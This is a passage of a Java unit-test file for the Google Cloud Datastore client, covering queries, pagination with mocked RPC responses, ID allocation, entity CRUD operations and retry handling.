assertEquals(entity5, entities.get(4)); assertEquals(entity6, entities.get(5)); assertEquals(6, entities.size()); List<Key> generatedKeys = response.getGeneratedKeys(); assertEquals(1, generatedKeys.size()); assertEquals( PARTIAL_ENTITY3.getProperties(), datastore.get(generatedKeys.get(0)).getProperties()); assertEquals(PARTIAL_ENTITY3.getKey(), IncompleteKey.newBuilder(generatedKeys.get(0)).build()); try { batch.submit(); fail("Expecting a failure"); } catch (DatastoreException ex) { // expected to fail } verifyNotUsable(batch); batch = datastore.newBatch(); batch.delete(entity4.getKey(), entity5.getKey()); batch.update(ENTITY1, ENTITY2, ENTITY3); batch.submit(); entities = datastore.fetch(KEY1, KEY2, KEY3, entity4.getKey(), entity5.getKey()); assertEquals(ENTITY1, entities.get(0)); assertEquals(ENTITY2, entities.get(1)); assertEquals(ENTITY3, entities.get(2)); assertNull(entities.get(3)); assertNull(entities.get(4)); assertEquals(5, entities.size()); } @Test public void testRunGqlQueryNoCasting() { Query<Entity> query1 = Query.newGqlQueryBuilder(ResultType.ENTITY, "select * from " + KIND1).build(); QueryResults<Entity> results1 = datastore.run(query1); assertTrue(results1.hasNext()); assertEquals(ENTITY1, results1.next()); assertFalse(results1.hasNext()); datastore.put(ENTITY3); Query<? extends Entity> query2 = Query.newGqlQueryBuilder(ResultType.ENTITY, "select * from " + KIND2 + " order by __key__") .build(); QueryResults<? extends Entity> results2 = datastore.run(query2); assertTrue(results2.hasNext()); assertEquals(ENTITY2, results2.next()); assertTrue(results2.hasNext()); assertEquals(ENTITY3, results2.next()); assertFalse(results2.hasNext()); query1 = Query.newGqlQueryBuilder(ResultType.ENTITY, "select * from bla").build(); results1 = datastore.run(query1); assertFalse(results1.hasNext()); Query<Key> keyOnlyQuery = Query.newGqlQueryBuilder(ResultType.KEY, "select __key__ from " + KIND1).build(); QueryResults<Key> keyOnlyResults = datastore.run(keyOnlyQuery); assertTrue(keyOnlyResults.hasNext()); assertEquals(KEY1, keyOnlyResults.next()); assertFalse(keyOnlyResults.hasNext()); GqlQuery<ProjectionEntity> keyProjectionQuery = Query.newGqlQueryBuilder(ResultType.PROJECTION_ENTITY, "select __key__ from " + KIND1) .build(); QueryResults<ProjectionEntity> keyProjectionResult = datastore.run(keyProjectionQuery); assertTrue(keyProjectionResult.hasNext()); ProjectionEntity projectionEntity = keyProjectionResult.next(); assertEquals(KEY1, projectionEntity.getKey()); assertTrue(projectionEntity.getProperties().isEmpty()); assertFalse(keyProjectionResult.hasNext()); GqlQuery<ProjectionEntity> projectionQuery = Query.newGqlQueryBuilder(ResultType.PROJECTION_ENTITY, "select str, date from " + KIND1) .build(); QueryResults<ProjectionEntity> projectionResult = datastore.run(projectionQuery); assertTrue(projectionResult.hasNext()); projectionEntity = projectionResult.next(); assertEquals("str", projectionEntity.getString("str")); assertEquals(TIMESTAMP_VALUE.get(), projectionEntity.getTimestamp("date")); assertEquals(2, projectionEntity.getNames().size()); assertFalse(projectionResult.hasNext()); } @Test public void testRunGqlQueryWithCasting() { @SuppressWarnings("unchecked") Query<Entity> query1 = (Query<Entity>) Query.newGqlQueryBuilder("select * from " + KIND1).build(); QueryResults<Entity> results1 = datastore.run(query1); assertTrue(results1.hasNext()); assertEquals(ENTITY1, results1.next()); assertFalse(results1.hasNext()); Query<?> query2 = Query.newGqlQueryBuilder("select * from " + KIND1).build(); QueryResults<?> results2 = datastore.run(query2); assertSame(Entity.class, results2.getResultClass()); @SuppressWarnings("unchecked") QueryResults<Entity> results3 = (QueryResults<Entity>) results2; assertTrue(results3.hasNext()); assertEquals(ENTITY1, results3.next()); assertFalse(results3.hasNext()); } @Test public void testGqlQueryPagination() throws DatastoreException { List<RunQueryResponse> responses = buildResponsesForQueryPagination(); for (int i = 0; i < responses.size(); i++) { EasyMock.expect(rpcMock.runQuery(EasyMock.anyObject(RunQueryRequest.class))) .andReturn(responses.get(i)); } EasyMock.replay(rpcFactoryMock, rpcMock); Datastore mockDatastore = rpcMockOptions.getService(); QueryResults<Key> results = mockDatastore.run( Query.newGqlQueryBuilder(ResultType.KEY, "select __key__ from *").build()); int count = 0; while (results.hasNext()) { count += 1; results.next(); } assertEquals(count, 5); EasyMock.verify(rpcFactoryMock, rpcMock); } @Test public void testRunStructuredQuery() { Query<Entity> query = Query.newEntityQueryBuilder().setKind(KIND1).setOrderBy(OrderBy.asc("__key__")).build(); QueryResults<Entity> results1 = datastore.run(query); assertTrue(results1.hasNext()); assertEquals(ENTITY1, results1.next()); assertFalse(results1.hasNext()); Query<Key> keyOnlyQuery = Query.newKeyQueryBuilder().setKind(KIND1).build(); QueryResults<Key> results2 = datastore.run(keyOnlyQuery); assertTrue(results2.hasNext()); assertEquals(ENTITY1.getKey(), results2.next()); assertFalse(results2.hasNext()); StructuredQuery<ProjectionEntity> keyOnlyProjectionQuery = Query.newProjectionEntityQueryBuilder().setKind(KIND1).setProjection("__key__").build(); QueryResults<ProjectionEntity> results3 = datastore.run(keyOnlyProjectionQuery); assertTrue(results3.hasNext()); ProjectionEntity projectionEntity = results3.next(); assertEquals(ENTITY1.getKey(), projectionEntity.getKey()); assertTrue(projectionEntity.getNames().isEmpty()); assertFalse(results2.hasNext()); StructuredQuery<ProjectionEntity> projectionQuery = Query.newProjectionEntityQueryBuilder() .setKind(KIND2) .setProjection("age") .setFilter(PropertyFilter.gt("age", 18)) .setDistinctOn("age") .setOrderBy(OrderBy.asc("age")) .setLimit(10) .build(); QueryResults<ProjectionEntity> results4 = datastore.run(projectionQuery); assertTrue(results4.hasNext()); ProjectionEntity entity = results4.next(); assertEquals(ENTITY2.getKey(), entity.getKey()); assertEquals(20, entity.getLong("age")); assertEquals(1, entity.getProperties().size()); assertFalse(results4.hasNext()); } @Test public void testStructuredQueryPagination() throws DatastoreException { List<RunQueryResponse> responses = buildResponsesForQueryPagination(); for (int i = 0; i < responses.size(); i++) { EasyMock.expect(rpcMock.runQuery(EasyMock.anyObject(RunQueryRequest.class))) .andReturn(responses.get(i)); } EasyMock.replay(rpcFactoryMock, rpcMock); Datastore datastore = rpcMockOptions.getService(); QueryResults<Key> results = datastore.run(Query.newKeyQueryBuilder().build()); int count = 0; while (results.hasNext()) { count += 1; results.next(); } assertEquals(count, 5); EasyMock.verify(rpcFactoryMock, rpcMock); } @Test public void testStructuredQueryPaginationWithMoreResults() throws DatastoreException { List<RunQueryResponse> responses = buildResponsesForQueryPagination(); for (int i = 0; i < responses.size(); i++) { EasyMock.expect(rpcMock.runQuery(EasyMock.anyObject(RunQueryRequest.class))) .andReturn(responses.get(i)); } EasyMock.replay(rpcFactoryMock, rpcMock); Datastore datastore = rpcMockOptions.getService(); QueryResults<Key> results = datastore.run(Query.newKeyQueryBuilder().build()); int count = 0; while (results.hasNext()) { count += 1; results.next(); } assertEquals(count, 5); assertEquals(QueryResultBatch.MoreResultsType.NO_MORE_RESULTS, results.getMoreResults()); EasyMock.verify(rpcFactoryMock, rpcMock); } private List<RunQueryResponse> buildResponsesForQueryPagination() { Entity entity4 = Entity.newBuilder(KEY4).set("value", StringValue.of("value")).build(); Entity entity5 = Entity.newBuilder(KEY5).set("value", "value").build(); datastore.add(ENTITY3, entity4, entity5); List<RunQueryResponse> responses = new ArrayList<>(); Query<Key> query = Query.newKeyQueryBuilder().build(); RunQueryRequest.Builder requestPb = RunQueryRequest.newBuilder(); query.populatePb(requestPb); QueryResultBatch queryResultBatchPb = RunQueryResponse.newBuilder() .mergeFrom(((DatastoreImpl) datastore).runQuery(requestPb.build())) .getBatch(); QueryResultBatch queryResultBatchPb1 = QueryResultBatch.newBuilder() .mergeFrom(queryResultBatchPb) .setMoreResults(QueryResultBatch.MoreResultsType.NOT_FINISHED) .clearEntityResults() .addAllEntityResults(queryResultBatchPb.getEntityResultsList().subList(0, 1)) .setEndCursor(queryResultBatchPb.getEntityResultsList().get(0).getCursor()) .build(); responses.add(RunQueryResponse.newBuilder().setBatch(queryResultBatchPb1).build()); QueryResultBatch queryResultBatchPb2 = QueryResultBatch.newBuilder() .mergeFrom(queryResultBatchPb) .setMoreResults(QueryResultBatch.MoreResultsType.NOT_FINISHED) .clearEntityResults() .addAllEntityResults(queryResultBatchPb.getEntityResultsList().subList(1, 3)) .setEndCursor(queryResultBatchPb.getEntityResultsList().get(2).getCursor()) .build(); responses.add(RunQueryResponse.newBuilder().setBatch(queryResultBatchPb2).build()); QueryResultBatch queryResultBatchPb3 = QueryResultBatch.newBuilder() .mergeFrom(queryResultBatchPb) .setMoreResults(QueryResultBatch.MoreResultsType.NO_MORE_RESULTS) .clearEntityResults() .addAllEntityResults(queryResultBatchPb.getEntityResultsList().subList(3, 5)) .setEndCursor(queryResultBatchPb.getEntityResultsList().get(4).getCursor()) .build(); responses.add(RunQueryResponse.newBuilder().setBatch(queryResultBatchPb3).build()); return responses; } @Test public void testQueryPaginationWithLimit() throws DatastoreException { List<RunQueryResponse> responses = buildResponsesForQueryPaginationWithLimit(); List<ByteString> endCursors = Lists.newArrayListWithCapacity(responses.size()); for (RunQueryResponse response : responses) { EasyMock.expect(rpcMock.runQuery(EasyMock.anyObject(RunQueryRequest.class))) .andReturn(response); if (response.getBatch().getMoreResults() != QueryResultBatch.MoreResultsType.NOT_FINISHED) { endCursors.add(response.getBatch().getEndCursor()); } } EasyMock.replay(rpcFactoryMock, rpcMock); Datastore datastore = rpcMockOptions.getService(); int limit = 2; int totalCount = 0; Iterator<ByteString> cursorIter = endCursors.iterator(); StructuredQuery<Entity> query = Query.newEntityQueryBuilder().setLimit(limit).build(); while (true) { QueryResults<Entity> results = datastore.run(query); int resultCount = 0; while (results.hasNext()) { results.next(); resultCount++; totalCount++; } assertTrue(cursorIter.hasNext()); Cursor expectedEndCursor = Cursor.copyFrom(cursorIter.next().toByteArray()); assertEquals(expectedEndCursor, results.getCursorAfter()); if (resultCount < limit) { break; } query = query.toBuilder().setStartCursor(results.getCursorAfter()).build(); } assertEquals(5, totalCount); EasyMock.verify(rpcFactoryMock, rpcMock); } @Test public void testRunKeyQueryWithOffset() { Query<Key> query = Query.newKeyQueryBuilder().setOffset(Integer.MAX_VALUE).build(); int numberOfEntities = datastore.run(query).getSkippedResults(); assertEquals(2, numberOfEntities); } @Test public void testRunKeyQueryWithLimit() { datastore.put(ENTITY1, ENTITY2); Query<Key> keyQuery = Query.newKeyQueryBuilder().setLimit(2).build(); QueryResults queryResults = datastore.run(keyQuery); int resultCount = 0; while (queryResults.hasNext()) { queryResults.next(); resultCount++; } assertEquals(2, resultCount); Query<Key> query = Query.newKeyQueryBuilder().setLimit(0).build(); QueryResults results = datastore.run(query); int count = 0; while (results.hasNext()) { results.next(); count++; } assertEquals(0, count); } private List<RunQueryResponse> buildResponsesForQueryPaginationWithLimit() { Entity entity4 = Entity.newBuilder(KEY4).set("value", StringValue.of("value")).build(); Entity entity5 = Entity.newBuilder(KEY5).set("value", "value").build(); datastore.add(ENTITY3, entity4, entity5); DatastoreRpc datastoreRpc = datastore.getOptions().getDatastoreRpcV1(); List<RunQueryResponse> responses = new ArrayList<>(); Query<Entity> query = Query.newEntityQueryBuilder().build(); RunQueryRequest.Builder requestPb = RunQueryRequest.newBuilder(); query.populatePb(requestPb); QueryResultBatch queryResultBatchPb = RunQueryResponse.newBuilder() .mergeFrom(datastoreRpc.runQuery(requestPb.build())) .getBatch(); QueryResultBatch queryResultBatchPb1 = QueryResultBatch.newBuilder() .mergeFrom(queryResultBatchPb) .setMoreResults(QueryResultBatch.MoreResultsType.NOT_FINISHED) .clearEntityResults() .addAllEntityResults(queryResultBatchPb.getEntityResultsList().subList(0, 1)) .setEndCursor(ByteString.copyFromUtf8("a")) .build(); responses.add(RunQueryResponse.newBuilder().setBatch(queryResultBatchPb1).build()); QueryResultBatch queryResultBatchPb2 = QueryResultBatch.newBuilder() .mergeFrom(queryResultBatchPb) .setMoreResults(QueryResultBatch.MoreResultsType.MORE_RESULTS_AFTER_LIMIT) .clearEntityResults() .addAllEntityResults(queryResultBatchPb.getEntityResultsList().subList(1, 2)) .setEndCursor( ByteString.copyFrom(new byte[] {(byte) 0x80})) // test invalid UTF-8 string .build(); responses.add(RunQueryResponse.newBuilder().setBatch(queryResultBatchPb2).build()); QueryResultBatch queryResultBatchPb3 = QueryResultBatch.newBuilder() .mergeFrom(queryResultBatchPb) .setMoreResults(QueryResultBatch.MoreResultsType.MORE_RESULTS_AFTER_LIMIT) .clearEntityResults() .addAllEntityResults(queryResultBatchPb.getEntityResultsList().subList(2, 4)) .setEndCursor(ByteString.copyFromUtf8("b")) .build(); responses.add(RunQueryResponse.newBuilder().setBatch(queryResultBatchPb3).build()); QueryResultBatch queryResultBatchPb4 = QueryResultBatch.newBuilder() .mergeFrom(queryResultBatchPb) .setMoreResults(QueryResultBatch.MoreResultsType.NO_MORE_RESULTS) .clearEntityResults() .addAllEntityResults(queryResultBatchPb.getEntityResultsList().subList(4, 5)) .setEndCursor(ByteString.copyFromUtf8("c")) .build(); responses.add(RunQueryResponse.newBuilder().setBatch(queryResultBatchPb4).build()); return responses; } @Test public void testEventualConsistencyQuery() { ReadOptions readOption = ReadOptions.newBuilder().setReadConsistencyValue(ReadConsistency.EVENTUAL_VALUE).build(); com.google.datastore.v1.GqlQuery query = com.google.datastore.v1.GqlQuery.newBuilder().setQueryString("FROM * SELECT *").build(); RunQueryRequest.Builder expectedRequest = RunQueryRequest.newBuilder() .setReadOptions(readOption) .setGqlQuery(query) .setPartitionId(PartitionId.newBuilder().setProjectId(PROJECT_ID).build()); EasyMock.expect(rpcMock.runQuery(expectedRequest.build())) .andReturn(RunQueryResponse.newBuilder().build()); EasyMock.replay(rpcFactoryMock, rpcMock); Datastore datastore = rpcMockOptions.getService(); datastore.run( Query.newGqlQueryBuilder("FROM * SELECT *").build(), ReadOption.eventualConsistency()); EasyMock.verify(rpcFactoryMock, rpcMock); } @Test public void testToUrlSafe() { byte[][] invalidUtf8 = new byte[][] {{(byte) 0xfe}, {(byte) 0xc1, (byte) 0xbf}, {(byte) 0xc0}, {(byte) 0x80}}; for (byte[] bytes : invalidUtf8) { assertFalse(ByteString.copyFrom(bytes).isValidUtf8()); Cursor cursor = new Cursor(ByteString.copyFrom(bytes)); assertEquals(cursor, Cursor.fromUrlSafe(cursor.toUrlSafe())); } } @Test public void testAllocateId() { KeyFactory keyFactory = datastore.newKeyFactory().setKind(KIND1); IncompleteKey pk1 = keyFactory.newKey(); Key key1 = datastore.allocateId(pk1); assertEquals(key1.getProjectId(), pk1.getProjectId()); assertEquals(key1.getNamespace(), pk1.getNamespace()); assertEquals(key1.getAncestors(), pk1.getAncestors()); assertEquals(key1.getKind(), pk1.getKind()); assertTrue(key1.hasId()); assertFalse(key1.hasName()); assertEquals(Key.newBuilder(pk1, key1.getId()).build(), key1); Key key2 = datastore.allocateId(pk1); assertNotEquals(key1, key2); assertEquals(Key.newBuilder(pk1, key2.getId()).build(), key2); try { datastore.allocateId(key1); fail("Expecting a failure"); } catch (IllegalArgumentException expected) { assertEquals(expected.getMessage(), "keys must be IncompleteKey instances"); } } @Test public void testAllocateIdArray() { KeyFactory keyFactory = datastore.newKeyFactory().setKind(KIND1); IncompleteKey incompleteKey1 = keyFactory.newKey(); IncompleteKey incompleteKey2 = keyFactory.setKind(KIND2).addAncestor(PathElement.of(KIND1, 10)).newKey(); Key key3 = keyFactory.newKey("name"); List<Key> result1 = datastore.allocateId(incompleteKey1, incompleteKey2, incompleteKey1); assertEquals(3, result1.size()); assertEquals(Key.newBuilder(incompleteKey1, result1.get(0).getId()).build(), result1.get(0)); assertEquals(Key.newBuilder(incompleteKey1, result1.get(2).getId()).build(), result1.get(2)); assertEquals(Key.newBuilder(incompleteKey2, result1.get(1).getId()).build(), result1.get(1)); try { datastore.allocateId(incompleteKey1, incompleteKey2, key3); fail("expecting a failure"); } catch (IllegalArgumentException expected) { assertEquals(expected.getMessage(), "keys must be IncompleteKey instances"); } } @Test public void testReserveIds() { ReserveIdsRequest reserveIdsRequest = ReserveIdsRequest.newBuilder().addKeys(KEY1.toPb()).build(); EasyMock.expect(rpcMock.reserveIds(reserveIdsRequest)) .andReturn(ReserveIdsResponse.newBuilder().build()) .times(1); EasyMock.replay(rpcFactoryMock, rpcMock); Datastore datastore = rpcMockOptions.getService(); datastore.reserveIds(KEY1); EasyMock.verify(rpcFactoryMock, rpcMock); } @Test public void testReserveIdsWithKeys() { Datastore datastore = createStrictMock(Datastore.class); EasyMock.expect(datastore.reserveIds(KEY1, KEY2)).andReturn(Arrays.asList(KEY1, KEY2)); replay(datastore); List<Key> result = datastore.reserveIds(KEY1, KEY2); assertEquals(KEY1, result.get(0)); assertEquals(KEY2, result.get(1)); verify(datastore); } @Test public void testGet() { Entity entity = datastore.get(KEY3); assertNull(entity); entity = datastore.get(KEY1); assertEquals(ENTITY1, entity); StringValue value1 = entity.getValue("str"); assertEquals(STR_VALUE, value1); BooleanValue value2 = entity.getValue("bool"); assertEquals(BOOL_VALUE, value2); ListValue value3 = entity.getValue("list"); assertEquals(LIST_VALUE2, value3); TimestampValue value4 = entity.getValue("date"); assertEquals(TIMESTAMP_VALUE, value4); LatLngValue value5 = entity.getValue("latLng"); assertEquals(LAT_LNG_VALUE, value5); FullEntity<IncompleteKey> value6 = entity.getEntity("partial1"); assertEquals(PARTIAL_ENTITY1, value6); ListValue value7 = entity.getValue("emptyList"); assertEquals(EMPTY_LIST_VALUE, value7); assertEquals(7, entity.getNames().size()); assertFalse(entity.contains("bla")); } @Test public void testLookupEventualConsistency() { ReadOptions readOption = ReadOptions.newBuilder().setReadConsistencyValue(ReadConsistency.EVENTUAL_VALUE).build(); com.google.datastore.v1.Key key = com.google.datastore.v1.Key.newBuilder() .setPartitionId(PartitionId.newBuilder().setProjectId(PROJECT_ID).build()) .addPath( com.google.datastore.v1.Key.PathElement.newBuilder() .setKind("kind1") .setName("name") .build()) .build(); LookupRequest lookupRequest = LookupRequest.newBuilder().setReadOptions(readOption).addKeys(key).build(); EasyMock.expect(rpcMock.lookup(lookupRequest)) .andReturn(LookupResponse.newBuilder().build()) .times(3); EasyMock.replay(rpcFactoryMock, rpcMock); Datastore datastore = rpcMockOptions.getService(); datastore.get(KEY1, ReadOption.eventualConsistency()); datastore.get(ImmutableList.of(KEY1), ReadOption.eventualConsistency()); datastore.fetch(ImmutableList.of(KEY1), ReadOption.eventualConsistency()); EasyMock.verify(rpcFactoryMock, rpcMock); } @Test public void testGetArrayNoDeferredResults() { datastore.put(ENTITY3); Iterator<Entity> result = datastore.fetch(KEY1, Key.newBuilder(KEY1).setName("bla").build(), KEY2, KEY3).iterator(); assertEquals(ENTITY1, result.next()); assertNull(result.next()); assertEquals(ENTITY2, result.next()); Entity entity3 = result.next(); assertEquals(ENTITY3, entity3); assertTrue(entity3.isNull("null")); assertFalse(entity3.getBoolean("bool")); assertEquals(LIST_VALUE2.get(), entity3.getList("list")); FullEntity<IncompleteKey> partial1 = entity3.getEntity("partial1"); FullEntity<IncompleteKey> partial2 = entity3.getEntity("partial2"); assertEquals(PARTIAL_ENTITY2, partial1); assertEquals(ENTITY2, partial2); assertEquals(ValueType.BOOLEAN, entity3.getValue("bool").getType()); assertEquals(LAT_LNG_VALUE, entity3.getValue("latLng")); assertEquals(EMPTY_LIST_VALUE, entity3.getValue("emptyList")); assertEquals(8, entity3.getNames().size()); assertFalse(entity3.contains("bla")); try { entity3.getString("str"); fail("Expecting a failure"); } catch (DatastoreException expected) { // expected - no such property } assertFalse(result.hasNext()); } @Test public void testGetArrayDeferredResults() throws DatastoreException { Set<Key> requestedKeys = new HashSet<>(); requestedKeys.add(KEY1); requestedKeys.add(KEY2); requestedKeys.add(KEY3); requestedKeys.add(KEY4); requestedKeys.add(KEY5); Iterator<Entity> iter = createDatastoreForDeferredLookup().get(KEY1, KEY2, KEY3, KEY4, KEY5); Set<Key> keysOfFoundEntities = new HashSet<>(); while (iter.hasNext()) { keysOfFoundEntities.add(iter.next().getKey()); } assertEquals(requestedKeys, keysOfFoundEntities); } @Test public void testFetchArrayDeferredResults() throws DatastoreException { List<Entity> foundEntities = createDatastoreForDeferredLookup().fetch(KEY1, KEY2, KEY3, KEY4, KEY5); assertEquals(foundEntities.get(0).getKey(), KEY1); assertEquals(foundEntities.get(1).getKey(), KEY2); assertEquals(foundEntities.get(2).getKey(), KEY3); assertEquals(foundEntities.get(3).getKey(), KEY4); assertEquals(foundEntities.get(4).getKey(), KEY5); assertEquals(foundEntities.size(), 5); } private Datastore createDatastoreForDeferredLookup() throws DatastoreException { List<com.google.datastore.v1.Key> keysPb = new ArrayList<>(); keysPb.add(KEY1.toPb()); keysPb.add(KEY2.toPb()); keysPb.add(KEY3.toPb()); keysPb.add(KEY4.toPb()); keysPb.add(KEY5.toPb()); List<LookupRequest> lookupRequests = new ArrayList<>(); lookupRequests.add(LookupRequest.newBuilder().addAllKeys(keysPb).build()); lookupRequests.add( LookupRequest.newBuilder() .addKeys(keysPb.get(1)) .addKeys(keysPb.get(2)) .addKeys(keysPb.get(4)) .build()); lookupRequests.add(LookupRequest.newBuilder().addKeys(keysPb.get(4)).build()); Entity entity4 = Entity.newBuilder(KEY4).set("value", StringValue.of("value")).build(); Entity entity5 = Entity.newBuilder(KEY5).set("value", "value").build(); List<LookupResponse> lookupResponses = new ArrayList<>(); lookupResponses.add( LookupResponse.newBuilder() .addFound(EntityResult.newBuilder().setEntity(ENTITY1.toPb())) .addFound(EntityResult.newBuilder().setEntity(entity4.toPb())) .addDeferred(keysPb.get(1)) .addDeferred(keysPb.get(2)) .addDeferred(keysPb.get(4)) .build()); lookupResponses.add( LookupResponse.newBuilder() .addFound(EntityResult.newBuilder().setEntity(ENTITY2.toPb())) .addFound(EntityResult.newBuilder().setEntity(ENTITY3.toPb())) .addDeferred(keysPb.get(4)) .build()); lookupResponses.add( LookupResponse.newBuilder() .addFound(EntityResult.newBuilder().setEntity(entity5.toPb())) .build()); for (int i = 0; i < lookupRequests.size(); i++) { EasyMock.expect(rpcMock.lookup(lookupRequests.get(i))).andReturn(lookupResponses.get(i)); } EasyMock.replay(rpcFactoryMock, rpcMock); return rpcMockOptions.getService(); } @Test public void testAddEntity() { List<Entity> keys = datastore.fetch(ENTITY1.getKey(), ENTITY3.getKey()); assertEquals(ENTITY1, keys.get(0)); assertNull(keys.get(1)); assertEquals(2, keys.size()); try { datastore.add(ENTITY1); fail("Expecting a failure"); } catch (DatastoreException expected) { // expected; } List<Entity> entities = datastore.add(ENTITY3, PARTIAL_ENTITY1, PARTIAL_ENTITY2); assertEquals(ENTITY3, datastore.get(ENTITY3.getKey())); assertEquals(ENTITY3, entities.get(0)); assertEquals(PARTIAL_ENTITY1.getProperties(), entities.get(1).getProperties()); assertEquals(PARTIAL_ENTITY1.getKey().getAncestors(), entities.get(1).getKey().getAncestors()); assertNotNull(datastore.get(entities.get(1).getKey())); assertEquals(PARTIAL_ENTITY2.getProperties(), entities.get(2).getProperties()); assertEquals(PARTIAL_ENTITY2.getKey().getAncestors(), entities.get(2).getKey().getAncestors()); assertNotNull(datastore.get(entities.get(2).getKey())); } @Test public void testUpdate() { List<Entity> keys = datastore.fetch(ENTITY1.getKey(), ENTITY3.getKey()); assertEquals(ENTITY1, keys.get(0)); assertNull(keys.get(1)); assertEquals(2, keys.size()); try { datastore.update(ENTITY3); fail("Expecting a failure"); } catch (DatastoreException expected) { // expected; } datastore.add(ENTITY3); assertEquals(ENTITY3, datastore.get(ENTITY3.getKey())); Entity entity3 = Entity.newBuilder(ENTITY3).clear().set("bla", new NullValue()).build(); assertNotEquals(ENTITY3, entity3); datastore.update(entity3); assertEquals(entity3, datastore.get(ENTITY3.getKey())); } @Test public void testPut() { Entity updatedEntity = Entity.newBuilder(ENTITY1).set("new_property", 42L).build(); assertEquals(updatedEntity, datastore.put(updatedEntity)); assertEquals(updatedEntity, datastore.get(updatedEntity.getKey())); Entity entity2 = Entity.newBuilder(ENTITY2).clear().set("bla", new NullValue()).build(); assertNotEquals(ENTITY2, entity2); List<Entity> entities = datastore.put(ENTITY1, entity2, ENTITY3, PARTIAL_ENTITY1); assertEquals(ENTITY1, entities.get(0)); assertEquals(entity2, entities.get(1)); assertEquals(ENTITY3, entities.get(2)); assertEquals(PARTIAL_ENTITY1.getProperties(), entities.get(3).getProperties()); assertEquals(PARTIAL_ENTITY1.getKey().getAncestors(), entities.get(3).getKey().getAncestors()); assertEquals(ENTITY1, datastore.get(ENTITY1.getKey())); assertEquals(entity2, datastore.get(entity2.getKey())); assertEquals(ENTITY3, datastore.get(ENTITY3.getKey())); Entity entity = datastore.get(entities.get(3).getKey()); assertEquals(entities.get(3), entity); } @Test public void testDelete() { Iterator<Entity> keys = datastore.fetch(ENTITY1.getKey(), ENTITY2.getKey(), ENTITY3.getKey()).iterator(); assertEquals(ENTITY1, keys.next()); assertEquals(ENTITY2, keys.next()); assertNull(keys.next()); assertFalse(keys.hasNext()); datastore.delete(ENTITY1.getKey(), ENTITY2.getKey(), ENTITY3.getKey()); keys = datastore.fetch(ENTITY1.getKey(), ENTITY2.getKey(), ENTITY3.getKey()).iterator(); assertNull(keys.next()); assertNull(keys.next()); assertNull(keys.next()); assertFalse(keys.hasNext()); } @Test public void testKeyFactory() { KeyFactory keyFactory = datastore.newKeyFactory().setKind(KIND1); assertEquals(INCOMPLETE_KEY1, keyFactory.newKey()); assertEquals( IncompleteKey.newBuilder(INCOMPLETE_KEY1).setKind(KIND2).build(), datastore.newKeyFactory().setKind(KIND2).newKey()); assertEquals(KEY1, keyFactory.newKey("name")); assertEquals(Key.newBuilder(KEY1).setId(2).build(), keyFactory.newKey(2)); } @Test public void testRetryableException() { LookupRequest requestPb = LookupRequest.newBuilder().addKeys(KEY1.toPb()).build(); LookupResponse responsePb = LookupResponse.newBuilder() .addFound(EntityResult.newBuilder().setEntity(ENTITY1.toPb())) .build(); EasyMock.expect(rpcMock.lookup(requestPb)) .andThrow(new DatastoreException(14, "UNAVAILABLE", "UNAVAILABLE", null)) .andReturn(responsePb); EasyMock.replay(rpcFactoryMock, rpcMock); Datastore datastore = rpcMockOptions.getService(); Entity entity = datastore.get(KEY1); assertEquals(ENTITY1, entity); EasyMock.verify(rpcFactoryMock, rpcMock); } @Test public void testRetryableExceptionForOperationWithTxn() { ByteString txnBytes = ByteString.copyFromUtf8("txn1"); LookupRequest requestPb = LookupRequest.newBuilder() .addKeys(KEY1.toPb()) .setReadOptions(ReadOptions.newBuilder().setTransaction(txnBytes).build()) .build(); LookupResponse responsePb = LookupResponse.newBuilder() .addFound(EntityResult.newBuilder().setEntity(ENTITY1.toPb())) .build(); EasyMock.expect(rpcMock.beginTransaction(EasyMock.anyObject(BeginTransactionRequest.class))) .andReturn(BeginTransactionResponse.newBuilder().setTransaction(txnBytes).build()); EasyMock.expect(rpcMock.lookup(requestPb)) .andThrow(new DatastoreException(14, "UNAVAILABLE", "UNAVAILABLE", null)) .andReturn(responsePb); EasyMock.replay(rpcFactoryMock, rpcMock); Datastore datastore = rpcMockOptions.getService(); Transaction transaction = datastore.newTransaction(); Entity entity = transaction.get(KEY1); assertEquals(ENTITY1, entity); EasyMock.verify(rpcFactoryMock, rpcMock); } @Test public void testNonRetryableExceptionForOperationWithTxn() { ByteString txnBytes = ByteString.copyFromUtf8("txn1"); LookupRequest requestPb = LookupRequest.newBuilder() .addKeys(KEY1.toPb()) .setReadOptions(ReadOptions.newBuilder().setTransaction(txnBytes).build()) .build(); EasyMock.expect(rpcMock.beginTransaction(EasyMock.anyObject(BeginTransactionRequest.class))) .andReturn(BeginTransactionResponse.newBuilder().setTransaction(txnBytes).build()); EasyMock.expect(rpcMock.lookup(requestPb)) .andThrow(new DatastoreException(10, "ABORTED", "ABORTED", null)) .times(1); EasyMock.replay(rpcFactoryMock, rpcMock); try { Datastore datastore = rpcMockOptions.getService(); Transaction transaction = datastore.newTransaction(); transaction.get(KEY1); Assert.fail(); EasyMock.verify(rpcFactoryMock, rpcMock); } catch (DatastoreException ex) { assertEquals("ABORTED", ex.getMessage()); } } @Test public void testNonRetryableException() { LookupRequest requestPb = LookupRequest.newBuilder().addKeys(KEY1.toPb()).build(); EasyMock.expect(rpcMock.lookup(requestPb)) .andThrow( new DatastoreException(DatastoreException.UNKNOWN_CODE, "denied", "PERMISSION_DENIED")) .times(1); EasyMock.replay(rpcFactoryMock, rpcMock); try { Datastore datastore = rpcMockOptions.getService(); datastore.get(KEY1); Assert.fail(); EasyMock.verify(rpcFactoryMock, rpcMock); } catch (DatastoreException ex) { assertEquals("denied", ex.getMessage()); } } @Test public void testRuntimeException() { LookupRequest requestPb = LookupRequest.newBuilder().addKeys(KEY1.toPb()).build(); String exceptionMessage = "Artificial runtime exception"; EasyMock.expect(rpcMock.lookup(requestPb)).andThrow(new RuntimeException(exceptionMessage)); EasyMock.replay(rpcFactoryMock, rpcMock); try { Datastore datastore = rpcMockOptions.getService(); datastore.get(KEY1); Assert.fail(); EasyMock.verify(rpcFactoryMock, rpcMock); } catch (DatastoreException ex) { assertEquals(exceptionMessage, ex.getCause().getMessage()); } } @Test public void testGqlQueryWithNullBinding() { Query<Entity> query = Query.newGqlQueryBuilder(ResultType.ENTITY, "select * from " + KIND1) .setNullBinding("name") .build(); Iterator<Entity> results = datastore.run(query); assertTrue(results.hasNext()); assertEquals(ENTITY1, results.next()); assertFalse(results.hasNext()); Query<Entity> gqlQuery = Query.newGqlQueryBuilder(ResultType.ENTITY, "select * from " + KIND1) .setNullBinding("name") .build(); Iterator<Entity> queryResults = datastore.run(gqlQuery); int count = 0; while (queryResults.hasNext()) { queryResults.next(); count++; } assertEquals(1, count); } @Test public void testQueryWithStartCursor() { Entity entity1 = Entity.newBuilder(Key.newBuilder(PROJECT_ID, KIND1, 